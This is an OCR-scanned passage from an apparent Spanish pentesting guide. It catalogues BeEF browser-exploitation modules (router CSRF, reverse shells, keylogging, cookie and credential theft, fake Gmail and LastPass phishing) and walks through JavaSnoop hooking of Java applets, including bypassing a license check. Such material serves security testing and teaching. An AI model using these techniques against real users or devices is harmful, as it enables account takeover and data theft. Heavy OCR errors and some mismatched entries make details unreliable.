ó.Zenoss 3.2.1 Add User CSRF 

Objectivo: Agregar una usuario a un servidor Zenoss Core 3.x 
Autor: bcoles 
Navegadores: Todos 
V.Zenoss 3.2.1 Daemon CSRF 

Objectivo: Obtener un shell inverso en un servidor Zenoss 3.x. Se requieren 
credenciales válidas. 

Autor: bcoles 
Navegadores: Todos 
S.boastMachine 3.1 Add User CSRF 

Camera 

l.Dlink DCS series CSRF 


Objectivo: Intenta cambiar la contraseña en una cámara de la serie Dlink DCS. 

Autor: bcoles 
Navegadores: Todos 

2.Linksys WVC series CSRF 

Objectivo: Cambiar la contraseña de administrador en una cámara inalámbrica 
Linksys WVCseries 
Autor: bcoles, nOxOO 
Navegadores: Todos 

Local Host 

1 .Windows Mail Client DoS 

Objectivo: Romper Windows Mail (on Vista and WinV SP2) remotamente 
Autor: bcoles 
Navegadores: Firefox 

2. ActiveX Command Execution 

Objectivo: Ejecutar comandos arbitrarios utilizando el objeto WSCRIPT.Shell 
Autor: bcoles 
Navegadores: lE 

3. Java Payload 

Inyectar un Applet Java malicioso firmado (JavaPayload) que se conecta de nuevo al 
atacante dando comandos básicos de shell, comando exec y wget. Antes de lanzarlo, 
asegúrese de que JavaPayload StagerHandler escucha, es decir: java 
javapayload.handler.stager.StagerHandler <payload> <IP> <port> — Jsh 
4.Safari Eaunch App 

Objectivo: Reescribe un enlace URL real seleccionado a una URL falsa 

Autor: antisnatchor 

Navegadores: Safari <=5.1 on OSX 

Router 

L3COM OíficeConnect Command Execution 

2. Asmax AR-804gu Command Execution 

3. BT Home Hub CSRE 

Objectivo: Habilita la administración remota y cambia la contraseña en un enrutador 
inalámbrico BT Home Hub. 

Autor: bcoles 
Navegadores: Todos 

4. CÍSCO E2400 CSRF 

Objectivo: Habilita el administrador remoto, desactiva el cortafuegos y cambia la 
contraseña en Cisco/Einksys E2400 
Autor: bcoles, nOxOO 
Navegadores: Todos 
ó.Comtrend CT-5367 CSRF 

Objectivo: Habilita el administrador remoto y cambia la contraseña en un enrutador 
CT-5367 
Autor: bcoles 
Navegadores: Todos 
ó.Comtrend CT 5624 CSRF 

Objectivo: Habilita la administración remota y cambia la contraseña en un enrutador 
Comtrend CT-5624 
Autor: bcoles 
Navegadores: Todos 
7.D-Link DIR-615 Password Wipe 

Objectivo: Habilita la administración remota y cambia la contraseña de administrador 
en un enrutador D-Eink DIR-615 


Autor; antisnatchor, nOxOO 
Navegadores: Todos 

8. D-Link DSL500T CSRF 

Objectivo: Cambia la contraseña web en un D-Link DSL500T CSRF 
Autor: bcoles 
Navegadores: Todos 

9. Huawei SmartAX MT880 CSRF 

Objectivo: Agregar una cuenta de administrador en un enrutador Huawei SmartAX 

MT880 

Autor: bcoles 

Navegadores: Todos 

10. Linksys BEFSR41 CSRF 

Objectivo: Agregar una cuenta de administrador en un enrutador Huawei SmartAX 

MT880 

Autor: bcoles 

Navegadores: Todos 

11. Linksys WRT54G CSRF 

Objectivo: Habilita la administración remota y cambia la contraseña en un enrutador 
Linksys WRT54G2 
Autor: Martin Barbolla 
Navegadores: Todos 

12. Linksys WRT54G2 CSRF 

13. Virgin Superhub CSRF 

Objectivo: Habilita la administración remota, desactiva el cortafuegos y cambia la 
contraseña de administrador en un enrutador Virgin Superhub. 

Autor: bcoles, nOxOO 
Navegadores: Todos 

Switch 

1. NetgearGS108T CSRF 

Objectivo: Cambiar la contraseña en un conmutador administrado Netgear GS108T 
Autor: Bart Leppens 
Navegadores: Todos 

XSS 

LAlienVault OSSIM 3.1 XSS 

Objectivo: Intenta conectar AlienVault OSSIM 3.1 usando XSS 
Autor: bcoles, muts 
Navegadores: Todos 

2. Cisco Collaboration Server 5 XSS 

Objectivo: Enganchar Cisco Collaboration Server 5 usando XSS 
Autor: bcoles, s4squatch 
Navegadores: Todos 
3.Serendipity <= 1.1.1 Add User CSRF 

Objectivo: Conecta Serendipity <= 1.6 usando XSS 
Autor: bcoles, Stefan Schurtz 
Navegadores: Todos 

Host 

1 .Detect Google Desktop 

Objectivo: Detectar Google Desktop 
Autor: bcoles 
Navegadores: Todos 
2.Detect Soñwares 


Objectivo: Este módulo intenta deteetar el software instalado en el dispositivo 
mediante Internet Explorer XMEDOM XXE deseubierto por Soroush Dalili (@irsdl). 
Si la técnica XMEDOM XXE falla, el módulo recurre al uso del controlador de 
protocolo 'res' para cargar imágenes de recursos conocidas de archivos EXE / DEE. 
También intenta enumerar los parches instalados si los archivos de desinstalación del 
paquete de servicio están presentes en el dispositivo (solo WinXP). 

Autor: bcoles 
Navegadores: lE 

3. Get Clipboard 

Objectivo: Roba el contenido del portapapeles del usuario 
Autor: bcoles 

Navegadores: lE 6-8 (lE 7&8 will prompt for permission) 

4. Get Internal IP Java 

Objectivo: Obtener la IP interna del sistema conectado 
Autor: antisnatchor 
Pecha: Junio 2012 

Navegadores: lE, Opera, Pirefox (User is notified on Chrome and Safari) 

5. Get Internal IP WebRTC 

Objectivo: Obtener la dirección IP interna utilizando un buen truco WebRTC 
Autor: xntrick, @natevw 
Pecha: Setiembre 2013 
Navegadores: Pirefox, Chrome 
ó.Get Physical Eocation 

Este módulo recuperará información de geolocalización basada en los puntos de 
acceso inalámbricos vecinos utilizando comandos encapsulados dentro de un Applet 
Java firmado. Se le solicitará al usuario que ejecute el applet de Java. Los detalles 
incluirán: Detalles de las coordenadas GPS y detalles de la dirección. Si la máquina 
victima tiene un cortafuegos que monitoriza las conexiones salientes (Zonealaram, 
LittleSnitch, etc.), se alertará a las llamadas a los mapas de Google. 

V.Get Protocol Handlers 

Objectivo: Identificar los manejadores de protocolos compatibles con un navegador 
Autor: bcoles 
Navegadores: Pirefox, lE 

8. Get System Info Java 

Este módulo recupera información básica sobre el sistema del dispositivo utilizando 
un applet Java sin firmar. Los detalles incluyen: detalles del sistema operativo, 
detalles de Java VM, nombres NIC y direcciones IP, número de procesadores, 
cantidad de memoria y modos de visualización de la pantalla. Tener en cuenta que el 
Java moderno se negará directamente a ejecutar applets de Java sin firmar y también 
rechazará los applets de Java autofirmados a menos que se agreguen a la lista de 
excepciones. 

9. Hook Default Browser 

Objectivo: Conectar al navegador predeterminado en Windows 

Autor: saafan 

Navegadores: All except on iOS and Mac 
1 O.Get Geolocation 

Objectivo: Este módulo recuperará la ubicación física del navegador conectado 
mediante la API de geolocalización. Se le solicitará al usuario que comparta su 
ubicación con el origen enganchado, a menos que el origen enganchado haya sido 
incluido en la lista blanca anteriormente. 

Autor: antisnatchor 


Navegadores: Internet Explorer 9 to latest, Firefox 3.5 to latest, Opera 10.6 to latest, 
Chrome 5 to latest, Safari 5 to latest 
11 .Get Registry Keys 

Objectivo: Obtener las claves de registro de un sistema Windows 
Autor: bcoles 
Navegadores: lE 
12.Get Wireless Keys 

Este módulo recuperará los perfiles inalámbricos del sistema de destino (solo 
Windows Vista y Windows 7) utilizando un applet Java sin firmar. Tener en cuenta 
que el Java moderno se negará directamente a ejecutar applets de Java sin firmar y 
también rechazará los applets de Java autofirmados a menos que se agreguen a la 
lista de excepciones. Deberá copiar los resultados a 'exported_wlan_profiles.xmr y 
luego volver a importarlos en sus ordenadores con Windows Vista/7 ejecutando el 
comando netsh wlan add profile filename = "exported_wlan_profiles.xml". Después 
de esto, simplemente se inicia y se conecta a la red inalámbrica sin ninguna solicitud 
de contraseña. 

IS.Detect CUES 

Objectivo: Detecta CUPS en el localhost 
Autor: bcoles 
Navegadores: Todos 

14. Make Telephone Cali 

Este módulo obligará al navegador a intentar una llamada telefónica en iOS. 
Explotará el manejo inseguro del esquema de URL 'tef en iOS. 

15. Detect Bit Defender 2012 

Objectivo: Detectará Bit Defender 2012 en el sistema 
Fecha: Junio 2013 
Autor: Nbblrr 
Navegadores: Todos 

IPEC 

1. Bindshell (POSIX) 

Objectivo: Ejecutar un comando en un bindshell POSIX / UNIX 
Autor: bcoles, wade 
Navegadores: Firefox 

2. Bindshell (Windows) 

Objectivo: Ejecutar un comando en un bindshell Windows 
Autor: bcoles, wade 
Navegadores: Firefox, Chrome 

3. Cross Site Printing (XSP) 

Objectivo: Enviar un mensaje a impresoras a través del navegador 
Autor: bcoles 
Navegadores: Firefox 

4. DNS Tunnel 

Objectivo: Envia datos ofuscados en una dirección a través de DNS 
Autor: bcoles 
Navegadores: Todos 
5.IMAP 

Objectivo: Enviar comandos a un servidor IMAP4 mediante comunicación entre 
protocolos. 

Autor: j galiana, wade 

Navegadores: Firefox, Chrome, Safari, Opera 

6.IRC 

Objectivo: Comunicarse con el servidor IRC a través de un navegador conectado 


Autor: j galiana 
Navegadores: Firefox 

Miscellaneous 

1 .Create Invisible Iframe 

Objectivo: Crear un iframe invisible en la página 
Autor: passbe 
Navegadores: Todos 
2.Google Search 
S.iFrame Event Key Logger 

Objectivo: Registrar las teclas a través de una superposición de iframe al 100% 
Autor: antisnatchor 
Navegadores: Todos excepto Opera 
4.iFrame Sniffer 

Objectivo: Escanear datos de otros orígenes a través de iframes 
Autor: Bart Eeppens 
Navegadores: Safari, lE 
ó.Eocal File Theft 

Objectivo: Roba archivos locales en ubicaciones comunes en Android, iOS, OSX y 

Windows 

Autor: mh 

Navegadores: Safari (< 10) and potentially others 
ó.Raw JavaScript 

Objectivo: Ejecuta JavaScript sin formato en el navegador 
Autor: wade, vo 
Navegadores: Todos 

NetWork 

1 .Detect Social Networks 

Objectivo: Detectar redes sociales 
Autor: xntrik, Mike Cardwell 
Navegadores: Todos 
2.Detect TOR 

Objectivo: Detecta si el objetivo está en la red TOR 
Autor: wade, pdp, bm, xntrik 
Navegadores: Todos 

5. Ping Sweep 

Objectivo: Realizar un barrido de ping de la red a través de Java 
Autor: bcoles 
Navegadores: Eirefox 
4.IRC NAT Pinning 

Objectivo: Uso del protocolo IRC para abrir un puerto detrás de dispositivos NAT 
Autor: Bart Eeppens 
Navegadores: Eirefox 
ó.Eingerprint NetWork 

Objectivo: Descubra puntos finales HTTP en una red 
Autor: bcoles, wade, antisnatchor 
Navegadores: Todos 

6. DNS Enumeration 

Objectivo: Descubre los nombres de dispositivos DNS dentro de la red de la víctima 
Autor: j galiana 

Navegadores: Eirefox, Chrome 

7. Ping Sweep (Java) 

Objectivo: Realiza un barrido de ping de la red a través de Java 


Autor: antisnatchor 
Navegadores: Safari, Opera, lE 
8.Fort Scanner 

Descripeión: Escanea puertos en un nombre de dispositivo determinado, utilizando 
WebSockets, CORS y etiquetas img. Eítiliza los 3 métodos para evitar puertos 
bloqueados o la Same Origin Policy. 

Autor: javier.marcos 
Navegadores: Eirefox, Chrome 

Persistence 

1 .Man-In-The-Browser 

Este módulo lanza un gran truco de Man-In-The-Browser: el módulo cargado 
manejará cada clic en un nuevo enlace. Para los enlaces en el mismo dominio, 
realizará una solicitud AJAX y cargará la nueva página en lugar de la anterior y 
agregará la página en el historial, no hay diferencia para el usuario con una carga 
clásica pero el navegador todavía está enganchado. Debido a la misma política de 
origen, no es posible tener el mismo comportamiento en otro dominio, por lo que en 
este caso, el módulo abrirá el enlace en una nueva pestaña. Tener en cuenta que este 
módulo dejará de funcionar si el usuario ingresa manualmente una nueva EÍRE en la 
barra de direcciones. 

2. Confirm Cióse Tab 

Objectivo: Muestra un diálogo de confirmación al usuario cuando intenta cerrar una 
pestaña. Si hace clic en si, vuelve a mostrar el cuadro de diálogo de confirmación. No 
funciona en Opera. 

Autor: antisnatchor 
Navegadores: Todos excepto Opera 

3. Créate Eoreground lErame 

Objectivo: Persiste la página enganchada a través de clics de enlace 
Autor: passbe 
Navegadores: Todos. 
d.Create Pop Under 

Descripción: Este módulo crea una nueva ventana emergente discreta debajo del 
gancho BeEE incluido. Se agregará otro nodo del navegador al árbol del navegador 
conectado. 

Autor: ethicalhack3r 
Navegadores: Todos 

Phonegap 

1 .Beep 

Objectivo: Beep 
Autor: Mike Haworth 

Navegadores: Any with PhoneGap available. 

2. Check connection 

Objectivo: Descubrir el tipo de conexión de red del teléfono conectado 
Autor: mh 
Navegadores: Todos 

3. Detect PhoneGap 

Detecta si la API PhoneGap está presente. Si está presente, el enlace BeEE se está 
ejecutando dentro de una aplicación y puede hacer uso de varias llamadas de la API 
PhoneGap. Varios módulos de comando de la API PhoneGap están disponibles para 
hacer uso de la API. 
d.Geolocation 

Este módulo recuperará la ubicación física del navegador conectado mediante la API 
Phonegap. 


5.List Files 

Objectivo; Listar los ficheros via PhoneGap API 
Autor; mh 
Navegadores: Todos 
ó.Persist resume 

Objectivo: Persistir sobre los eventos de suspensión/activación de aplicaciones 
Autor; mh 
Navegadores: Todos 
V.Persistence 

Objectivo: inserte el gancho de BeEF en el index.html de PhoneGap 
Autor: mh 

Navegadores; Safari on iPhone with PhoneGap API 
S.Start Recording Audio 

Objectivo: Iniciar la grabación de audio en un fichero 
Autor: Mike Haworth 
Navegadores: any with Adobe Phonegap 
9.Stop Recording Audio 

Objectivo: Parar la grabación de audio 
Autor: Mike Haworth 
Navegadores: any with Adobe Phonegap 
lO.Upload File 

Objectivo: Subir un archivo en el dispositivo de la victima a través de las API 
PhoneGap 
Autor: mh 
Navegadores: Todos 
Social Engineering 

1 .Autocomplete Theft 

Objectivo: Robar valores de autocompletar de Eirefox 
Autor: Stefano Di Paola, bcoles 
Navegadores: Eirefox 
2.Clickjacking 

Objectivo: Realizar clickjacking básico de clics múltiples 
Autor; Brigette Eundeen, Rich Eundeen 
Navegadores: Eirefox, Chrome, lE 
S.Clippy 

Objectivo: Muestra una imagen recortada y le pide al usuario que haga cosas. 

Autor: vt, denden 
Navegadores: Todos 
4.Eake Evernote Web Clipper Login 

Objectivo: Inicio de sesión falso de EverNote Web Clipper 
Autor: xntrik 
Navegadores: Chrome 
ó.Eake Elash UpEecha 

Objectivo: Solicita al usuario que instale un upEecha en Adobe Elash Player. El 
archivo que se entregará podría ser una extensión de Chrome o Eirefox. Una 
extensión de Chrome tiene acceso privilegiado y puede hacer muchas cosas. Acceder 
a todas las pestañas e inyectar BeEE en todas las pestañas Usar el navegador 
conectado como proxy para hacer solicitudes de dominio cruzado. Obtener todas las 
cookies, incluidas las HTTP. Ea entrega de la extensión de Chrome funcionará en 
Chrome <= 20. Desde Chrome 21, las cosas cambiaron en términos de como se 
pueden cargar las extensiones. Ea extensión de Eirefox está deshabilitando 


PortBanning (puertos 20,21,22,25,110,143), habilitando Java, anulando el UserAgent 
y las páginas predeterminadas home/new tab. 

Autor: mh, antisnatehor 
Navegadores: Todos 
ó.Fake LastPass 

Objeetivo: Roba las eredeneiales a través de la ventana emergente falsa LastPass 
Autor: xntrik, geattani 
Navegadores: Chrome 
V.Google Phishing 

Objeetivo: Obtener las eredeneiales de gmail eon suplantaeión de identidad 
Autor: floyd 
Navegadores: Chrome 
8 .Leamtuf Download 

Objeetivo: Engaña al usuario para que deseargue un arehivo de otro dominio 
Autor: Bart Leppens 
Navegadores: Firefox, Chrome 
9.Fake Notifieation Bar 

Objeetivo: Haeer que el usuario deseargue y ejeeute arehivos mabeiosos a través de 
una notifieaeión 
Autor: xntrik 
Navegadores: Todos 

I O.Fake Notifieation Bar (Chrome) 

Objeetivo: Haee que el usuario deseargue y ejeeute arehivos mabeiosos a través de 
una notifieaeión 
Autor: xntrik, beoles 
Navegadores: Chrome 

II .Fake Notifieation Bar (FF) 

Objeetivo: Haee que el usuario deseargue y ejeeute arehivos mabeiosos a través de 
una notifieaeión 
Autor: xntrik, beoles 
Navegadores: Firefox 
12.Fake Notifieation Bar (lE) 

Objeetivo: Haee que el usuario deseargue y ejeeute arehivos mabeiosos a través de 
una notifieaeión 
Autor: xntrik, beoles 
Navegadores: lE 
IS.Pretty Theft 

Objeetivo: Pide al usuario su nombre de usuario y eontraseña usando un mareo 
flotante. 

Autor: pwndizzle, vt, xntrik 
Navegadores: Safari, Firefox, Chrome, Opera 
14.Simple Hijaeker 

Objeetivo: Seeuestra los olios en los enlaoes para mostrar lo que desea. 

Autor: gallypette 
Navegadores: Todos 
IS.TabNabbing 

Objeetivo: Este módulo redirige a la URF espeoifioada después de que la pestaña ha 
estado inaotiva durante un periodo de tiempo espeoifioo. 

Autor: beoles 
Navegadores: Todos 


Ejemplo 1 - Módulo Get Cookie 


Se trata de obtener las cookie del navegador de la víetima. Para ello se debe emplear el módulo 
“Get Cookie”, se ve algo eomo la figura siguiente 


Ejemplo 2 - Módulo Get Page Links 

Este módulo reeuperará las HREFS de la página de destino. Si eehamos un vistazo a la 
eódigo fuente de la página web en cuestión, podemos ver el siguiente código: 

</pre> 

<ul> 

<li> <a href="http://beefproject.com" target="_blank"> La explotación del navegador 
Página de inicio del Proyecto Marco </a> </li> 

<li> <a href="http://ha.ckers.org/" target="_blarLk"> página de inicio de ha.ckers.org </a> 
</li> 

<li> <a href="http://slashdot.org/" target="_blank"> Slashdot </a> </li> 

</ul> 

<pre> 


Hay tres enlaces en el código HTML: 

- http:/^eefproject.com 

- http://ha.ckers.org/ 

- http://slashdot.org/ 

Ejemplo 3 - Módulo Get Page HTML 

Se trata de obtener el contenido de una página HTML y se puede ver algo así 

Ejemplo 4 - Módulo Create Alert Dialog 

Este es el primer módulo que no es invisible para el usuario. Este módulo envía un diálogo de alerta 
al navegador enganchado. Especificamos "¡Helio!" como texto de alerta y ejecutamos 
el módulo. El navegador web conectado mostró lo que se puede ver en la imagen siguiente: 

Ejemplo 5 - Módulo Google Search 

Este módulo buscó en Google desde el navegador conectado. Una consulta de búsqueda exitosa 
se presenta en la imagen siguiente: 

Ejemplo 6 - Módulo Raw JavaScript 

Este módulo envía el código JavaScript ingresado en el campo de entrada para ser ejecutado en 
el navegador enganchado. El código se ejecuta dentro de una función anónima y el valor de retomo 
se pasa al marco. Si ingresamos la alerta ("¡Helio World!"); devuelve "Ok"; en el campo de entrada, 
el navegador enganchado mostrará una ventana de alerta como en la imagen siguiente: 

Podemos ver que nuestro JavaScript se ejecutó con éxito. 

Ejemplo 7 - Módulo Detect Social Networks 

Este módulo detectará si el navegador conectado está actualmente conectado en alguna de las 
redes sociales enumeradas aquí: Gmail, Facebook o Twitter. La respuesta cuando el usuario se 
autentica en la red social de Facebook se presenta en la imagen siguiente: 

Ejemplo 8 - Módulo Google Phising 

Este módulo falsificará la página web de inicio de sesión de Google. Al iniciar la sesión en Gmail, 
las credenciales del usuario se enviarán de vuelta al marco de BeEF. Cuando hacemos clic en el 
botón Ejecutar, aparecerá la página web de Gmail Google, como se muestra a continuación: 



Podemos ver que la página web se ve exactamente como la página web de inicio de sesión de 
Gmail, excepto la URL que es diferente. Al ingresar la prueba de nombre de usuario y contraseña: 
prueba, se recibirá la respuesta en el marco de BeEF que contendrá el nombre de usuario y la 
contraseña ingresados. 



31. Javasnoop 


Esta herramienta permite interceptar métodos, alterar datos y piratear las aplicaciones Java que se 
ejecutan en los ordenadores. Normalmente sin acceso al código fuente original, probar la seguridad 
de un cliente Java es impredecible en el mejor de los casos y poco realista en el peor. Con el acceso 
a la fuente original, puede ejecutar un programa Java simple y adjuntar un depurador de forma 
remota, pasando por el código y cambiando las variables cuando sea necesario. Hacer lo mismo con 
un applet es un poco más difícil. Desafortunadamente los escenarios de la vida real no ofrecen esta 
opción de todos modos. La compilación y la descompilación de Java no son realmente tan 
deterministas como podria imaginar. Por lo tanto no puede simplemente descompilar una aplicación 
Java, ejecutarla localmente y adjuntarle un depurador. 

JavaSnoop intenta resolver este problema permitiéndo la conexión a un proceso existente y 
comenzar a manipular instantáneamente las llamadas a métodos, ejecutar códigos personalizados o 
simplemente observar lo que sucede en el sistema. 

JavaSnoop es una nueva generación de herramientas que fue creada para aliviar los problemas 
discutidos en la sección anterior. El objetivo de JavaSnoop fue hacer un programa de prueba de 
seguridad para aplicaciones Java que tenia las siguientes cualidades: 

1. Permitir la intercepción fácil de cualquier método en la JVM 

2. Permitir la edición de valores y parámetros de retomo 

3. Permitir que se inserte Java personalizado en cualquier método 

4. Capaz de trabajar en cualquier tipo de aplicación Java (J2SE, Applet o Java Web Start) 

5. Capaz de trabajar en procesos Java ya en ejecución 

6. No requiere ningún código fuente de destino (original o descompilado) 

La única forma de lograr estos objetivos es agregar ganchos en la etapa de carga en el código de 
bytes de las clases objetivo. Para hacer eso sin recompilación era imposible antes de Java 5.0. Sin 
embargo la adición de Java 5.0 de agentes Java no nativos y la clase Instmmentation abrió la puerta 
para la modifícación avanzada de una JVM en tiempo de ejecución. 

No fue hasta que Java 6.0 salió con Attach API que la modifícación interprocesos continuo de una 
JVM en ejecución se volvió práctica. Attach API es una extensión de Sun que proporciona una 
manera para que un proceso Java se "adjunte" a otra JVM en tiempo de ejecución. Este puente se 
puede usar para cargar agentes Java en la máquina virtual remota. Entonces estos agentes puede 
redefínir clases o recuperar información sobre la JVM a la que están adjuntas. Este mecanismo 
permite que JavaSnoop satisfaga los requisitos enumerados anteriormente. 

JavaSnoop puede usar la API Attach y la clase Instmmentation para saltar a otra JVM en la máquina 
e instalar varios "ganchos" a lo largo de los métodos de clase en este sistema. Estos ganchos son 
utilizados por un agente para comunicarse con una GUI que permite al usuario de JavaSnoop 
"interceptar" las llamadas dentro de la JVM. 

Para redefínir una clase, se debe proporcionar una matriz de octetos sin formato que contenga el 
código de bytes de la clase modificada. Esto significa que para tener pmebas significativas, la clase 
debe hacer todo lo que está diseñado originalmente para hacer, pero también realizar estas tareas 
relacionadas con JavaSnoop. 

Esto requerió una modificación selectiva del bytecode de clase existente. Aunque Java bytecode es 
relativamente fácil de entender e implementar, una biblioteca de generación de bytecode se utilizó 
para acelerar el tiempo de desarrollo. Esta biblioteca Javassist5 se utiliza para la manipulación de 



clase de propósito general. Permite que un usuario inserte abstraetamente código Java adicional en 
métodos de clase Java. 


Debido a que todos los tipos de proeesos Java aún residen dentro de una JVM estándar, JavaSnoop 
es eapaz de "adjuntar" a cualquier tipo de proeeso Java en una máquina, se debe notar que 
JavaSnoop también puede inieiar un proeeso desde cero en caso de que el usuario quiera intereeptar 
eventos que se perderían al adjuntar al proeeso después del inieio. 

El propósito de JavaSnoop es instalar "ganchos" en los métodos. Esos ganehos pueden realizar una 
o muehas de las siguientes aeeiones: 

• Editar parámetros del método 

• Editar el valor de retorno del método 

• Método de pausa 

• Ejecutar script proporcionado por el usuario al eomienzo del método 

• Ejeeutar seript proporeionado por el usuario al final del método 

• Imprimir los parámetros en la eonsola o en un arehivo 

Hay muchas razones para "enganehar" un método. Quizás la aplicación devuelve "falso" desde un 
método que realiza una verifieaeión de lieeneia y al ataeante le gustaría eambiar este valor a 
"verdadero". Tal vez la aplieaeión envía objetos serializados a través de SSEy usted 
quisiera manipular el objeto justo antes de que llegue a la llamada que lo envía a la red. Es posible 
que exista una vulnerabilidad de tiempo de verifieaeión de tiempo de uso que desearía hacer más 
fáeil la explotaeión deteniendo la aplieaeión en una llamada determinada. 

Podrían oeurrir situaeiones eomplejas en las que el usuario de JavaSnoop requiriera eseribir eódigo 
Java personalizado para explotar alguna condieión o iniciar sus propias acciones en lugar de 
intereeptando los existentes. Para aeomodar esto, JavaSnoop permite al usuario, ejeeutar eódigo 
Java arbitrario al prineipio y al final de eualquier método. 

Quizás lo que se está buseando es menos eomplejo y solo se quiere ver euales son los parámetros 
enviados a eiertos métodos. Imprimir los parámetros de las llamadas MessageDigest.getInstanee 
(algoritmo de eadena) mostrarían que algoritmos de hash se están utilizando en el eliente. También 
es posible esta funeión eomún y simple. 

Dado que JavaSnoop haee que los datos y el tráfieo de las aplieaeiones sean fáeiles de manipular, 
deseubrir el método eorreeto para enganehar, se ha eonvertido en la parte difieil de la evaluaeión. A 
pesar de que nada puede sustituir la revisión del eódigo para eomprender la lógiea de una 
aplieaeión, un usuario sin aeeeso al código fuente tiene algunas opeiones para encontrar el ganeho 
eorreeto. El usuario puede elegir una API Java que sospeehe que puede desempeñar un papel en una 
prueba, puede busear métodos por nombre o elase y pueden usar un modo de investigaeión espeeial 
de JavaSnoop, llamado "Mode Canary". 

Ineluso después de busear y adivinar, puede ser difieil eneontrar que métodos intereeptar. Es 
probable que los ataeantes estén interesados en métodos donde los datos que ingresan 
la interfaz de usuario termina yendo. Si el flujo de sus datos a través de los métodos de clase 
pudiera de alguna manera, puede terminar ayudando al usuario a eneontrar funeiones para 
enganehar. 

Descubrir este tiempo de vida es el propósito del "Mode Canary", un modo únieo y útil 
característieo de JavaSnoop. En este modo se define algún valor "eanary" que se desea rastrear a 
través del sistema. Este debería ser un valor únieo que se vaya a ingresar en la aplieaeión en algún 
lugar, probablemente a través de un eampo de formulario o un arehivo de propiedades. Una vez que 



se elige este valor, se puede inieiar el modo Canary. JavaSnoop luego eliminará todos los otros 
ganchos actualmente en uso y luego agrega "oyentes" canarios a cada método en la JVM que tiene 
el tipo de datos del canario como parámetro. 

Cada vez que se encuentra al canary que es enviado a un método, se envía un "chirrido" a 
JavaSnoop, que le permite al usuario saber que método funciona en el valor canary. De esta manera, 
esto equivale a una forma muy primitiva y torpe de análisis de flujo de datos. Instrumentar un 
porcentaje considerable de métodos en la JVM es un proceso costoso en ciclos. Y una vez que estos 
métodos estén instrumentados, la aplicación funcionará lentamente ya que los "oyentes" canary se 
ejecutan constantemente. Por lo tanto el modo Canary es un modal independiente que no puede 
ejecutarse simultáneamente con otros ganchos. También es posible limitar los métodos conectados a 
un determinado paquete. 

El modo Canary se puede usar con todos los tipos de datos primitivos y el objeto String. 

A veces se pueden necesitar ganchos en funciones que se llaman muchas, muchas veces. Para 
asegurarse de que JavaSnoop solo se ejecute cuando sea necesario, un gancho puede tener cero o 
más condiciones. Un usuario puede pedir a JavaSnoop que solo se conecte cuando se cumplan las 
condiciones especificadas o que no se cumplen. Cada condición es una prueba lógica en un 
parámetro pasado a la función. Por ejemplo, un método que tiene parámetros booleanos y de cadena 
puede tener 2 condiciones que especifican que las acciones del enlace solo deben realizarse cuando 
el valor booleano es "True" y el parámetro String contiene la palabra "security". 

El agente JavaSnoop que se instala en las aplicaciones durante la operación requiere los permisos 
que generalmente no se otorgan al código no confiable. Por ejemplo, el agente abre un hilo de 
segundo plano y el socket del servidor para comunicarse con la GUI. Debido a que estas 
operaciones generalmente no se otorgan a código no confiable, el usuario de JavaSnoop debe 
tener todos los privilegios (java.security.AllPermission) a la aplicación que se está evaluando. 

Eas aplicaciones J2SE ejecutadas normalmente en el escritorio ya tienen este permiso, pero el 
usuario debe alterar sus archivos java.policy para que el agente trabaje en applets y Java Web Start. 
Se debe tener mucho cuidado al otorgar este privilegio, ya que esta política de Java es la misma que 
se usará en el navegador del usuario mientras se ejecutan applets arbitrarios en la web. 

Se pueden otorgar permisos a sitios específicos y URL de base de código para restringir la 
probabilidad de dar permiso erróneamente a applets maliciosos arbitrarios. Hay una pregunta 
abierta sobre si AllPermission se puede otorgar a un sitio en particular en Java 1.6+ en Windows 
Vista, pero otros sistemas operativos no han presentado este problema. 

Ejemplo 1 

Inyectando JavaSnoop en un proceso 

La herramienta JavaSnoop proporciona 2 tipos de procesos para ser pirateados. 

1. Un proceso existente 

Podemos inyectar JavaSnoop en un proceso que ya se está ejecutando, seleccionando de la lista 
disponible de procesos en ejecución. 


2. Un nuevo proceso: 

Alternativamente podemos comenzar un nuevo proceso seleccionando el archivo JAR que se 
enganchará / interceptará. 



Funcionalidad de la interfaz de la herramienta JavaSnoop 

La interfaz principal de la herramienta JavaSnoop se divide en 4 partes, como se muestra en el 
siguiente diagrama. 

Primera parte: 

En esta parte, seleccionamos la clase o método que necesita ser enganchado o interceptado. La 
interfaz proporciona un botón para agregar un nuevo Hook. Luego podemos agregar un método de 
una clase especifica disponible de la lista, como se muestra en la imagen siguiente: 

Segunda parte: 

Esta parte proporciona características para configurar varias opciones para interceptar las llamadas a 
los métodos. Podemos establecer condiciones de expresión regular para hacer coincidir e interceptar 
el tráfico de las llamadas al método. A continuación se muestra una imagen: 

Tercera parte: 

Esta parte de la interfaz ayuda a decidir que hacer con un enlace enganchado que seleccionamos de 
la primera parte de la interfaz. Esto proporciona varias opciones como las siguientes: 

• Imprimir los parámetros/stacktrace en la consola o en un archivo en particular 

• Ejecutar Scripts personalizados 

• La manipulación de los parámetros. 

• Alterar el valor de retorno 

• Programa de pausa 

Cuarta parte: 

El resultado de los ganchos y las clases descompiladas de la aplicación de destino se muestran en 
esta área. 

Interceptar el tráfico de un applet que se ejecuta dentro de un navegador. 

Un applet de Java es un applet que se entrega a los usuarios en forma de código de bytes de Java. 
Los applets de Java pueden ser parte de una página web y ser ejecutados por la Máquina virtual de 
Java (JVM) en un proceso separado del navegador web o ejecutarse en AppletViewer de Sun, una 
herramienta independiente para probar applets. 

Paso 1: Tenemos una muestra de un applet de inicio de sesión incrustado en el navegador web, que 
toma las credenciales del usuario y lo reenvía al servidor para su autenticación. Para interceptar el 
tráfico del applet de Java, utilizamos las técnicas de enganche de métodos de JavaSnoop para 
interceptar el tráfico. La siguiente instantánea muestra el Applet de inicio de sesión con las 
credenciales de usuario ingresadas en los campos de entrada. 

Paso 2: Como ya hemos abierto el applet de Java en el navegador, seleccionamos la opción "An 
existing process" de la herramienta JavaSnoop para adjuntar el agente en le applet en ejecución 
como se muestra a continuación. 


Paso 3: Adjuntar el agente al applet en ejecución abrirá la interfaz de JavaSnoop. Entonces podemos 
seleccionar las clases y los métodos respectivos que se engancharán para interceptar el tráfico. 
Seleccionamos la clase requerida para la cual se van a enganchar los métodos, como se muestra a 
continuación: 


Paso 4: luego seleccionamos los métodos de esta clase especifica, como se muestra a continuación 




Paso 5: La siguiente eaptura de pantalla muestra la interfaz JavaSnoop que eontiene los métodos 
enganehados y las eondieiones aplieadas en los métodos para intereeptar el tráfieo de applets de 
Java. 


Paso 6; Tan pronto eomo enviemos las eredeneiales de usuario en el applet de inieio de sesión, la 
herramienta intereepta el tráfieo y le proporeiona al usuario una ventana emergente para editar y 
reenviar el tráfieo intereeptado. 


Ejemplo 2 

